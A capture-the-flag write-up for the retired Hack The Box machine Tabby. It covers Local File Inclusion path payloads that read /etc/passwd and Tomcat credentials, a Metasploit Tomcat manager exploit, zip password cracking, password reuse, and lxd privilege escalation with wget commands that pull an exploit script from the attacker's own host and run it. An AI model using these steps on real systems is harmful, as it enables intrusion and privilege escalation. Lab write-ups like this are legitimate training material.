In this article, we will go through a retired machine on Hack The Box called Tabby.
We will run an nmap scan on the IP address to discover open ports and their versions.
nmap -sV -oN portscan.log 10.10.10.194
Contents of portscan.log:
# Nmap 7.91 scan initiated Sun Nov 15 23:26:28 2020 as: nmap -sV -oN
portscan.log 10.10.10.194
Nmap scan report for megahosting.htb (10.10.10.194)
Host is up (0.18s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8080/tcp open http Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 15 23:26:58 2020–1 IP address (1 host up) scanned in 30.35 seconds
We can see two http ports opened at 80 and 8080 which we will check individually.
On port 80, we find the following website:
We can see a contact email ID called [email protected]. Add the IP address 10.10.10.194 and the host name megahosting.htb in the file /etc/hosts.
If we go to the ‘NEWS’ section, we are taken to the web page whose URL contains a ‘file’ parameter and the value of that parameter is ‘statement’. We can verify if the parameter can be exploited for Local File Inclusion vulnerability by passing the value ‘../../../../etc/passwd’. We get the contents of /etc/passwd file in the response.
Now we need to find out which file can be accessed in order to obtain any sensitive information. Let’s check what we have on Port 8080.
It says that the CATALINA_HOME is in /usr/share/tomcat9 and users are defined at /etc/tomcat9/tomcat-users.xml. The file tomcat-users.xml is the one which we are interested in but the directory seems to be wrong or probably we don’t have the permission to view the file in that directory. In such scenarios, I use GitHub to see what files I can access. The Apache Tomcat version that is being used by the website is 9.0.31. So we can go to GitHub and search for the tomcat repository and check the files we have for version 9.0.x. Click here to go the repository.
I searched for tomcat-users.xml within the repository and found one at /conf path.
I changed the parameter value to ‘../../../../usr/share/tomcat9/conf/tomcat-users.xml’, but I still didn’t get any response. Next thing I did was to run wfuzz and look for any alternative directories where the tomcat-users.xml might be located.
wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt — hl 0 megahosting.htb/news.php?file=/../../../../usr/share/tomcat9/FUZZ/tomcat-users.xml | tee wfuzz.log
The tee command after the pipe is optional. I have used the filter to hide all the responses with length 0.
We see that we are getting a non zero length for the value ‘etc’. So the new path becomes ‘/usr/share/tomcat9/etc/tomcat-users.xml’. This gives us a blank page but on inspecting the source code we get the following:
The username is ‘tomcat’ and the password is ‘$3cureP4s5w0rd123!’. Now go to the web page on port 8080 and access the host-manager webapp link. Enter the obtained credentials.
A quick google search can be done to learn about exploits related to this manager. Click here for the exploit that I used.
Open metasploit and configure the parameters.
Make sure that the path is changed to /manager/text and the target is set as 1.
Type run to obtain a meterpreter session. On listing the contents in the directory ‘/var/www/html/files’, we can see a zip file called 16162020_backup.zip.
Download the zip using the download command to the desired directory.
The file seems to be password protected. We can use fcrackzip to crack the zip password.
fcrackzip -uDp ~/Desktop/rockyou.txt 16162020_backup.zip | tee zip-file.log
The tee command after the pipe is optional. Make sure that the wordlist path is correct. I like to keep the rockyou.txt file in my Desktop.
The cracked password is ‘admin@it’. However, the zip file doesn’t contain anything useful. Let’s move on to the meterpreter session and see what else is available.
Use ‘shell -t’ to get a bash shell session. On listing the contents of ‘/home’ directory, we can see a file called ‘ash’. We currently do not have the permission to view that directory. If we try to change to user ‘ash’ and use the password ‘admin@it’ (pure guess work), we can see that we are authenticated as the user ‘ash’.
The output of the id command contains some interesting information which we will address pretty soon. For now, let’s see the contents of ‘user.txt’ file in the home directory of user ash.
After obtaining the user flag, let’s proceed to obtain the root flag. On using the ‘id’ command we can see that the user ash belongs to the group lxd. If you ever see lxd, there is a good chance that it is vulnerable to privilege escalation. I searched for the exploit which can be found here.
Follow the steps given in the above link. After successfully building the alpine image(I changed the name alpine-v3.12 -x86_64–20201115.tar.gz to alpine.tar.gz for simplicity) and storing the contents of the script in a file called exploit.sh, we can proceed to upload the files to the target machine.
Use python to create an http server:
python -m SimpleHTTPServer
Go to the target machine and run the following commands one by one:
wget http://10.10.14.150:8000/alpine.tar.gz
wget http://10.10.14.150:8000/exploit.sh
chmod 775 exploit.sh
./exploit.sh -f alpine.tar.gz
Then run the container using lxc command:
lxc start privesc
lxc exec privesc /bin/bash
The root.txt file is under /mnt/root/root directory. This is our root flag.
0 Comments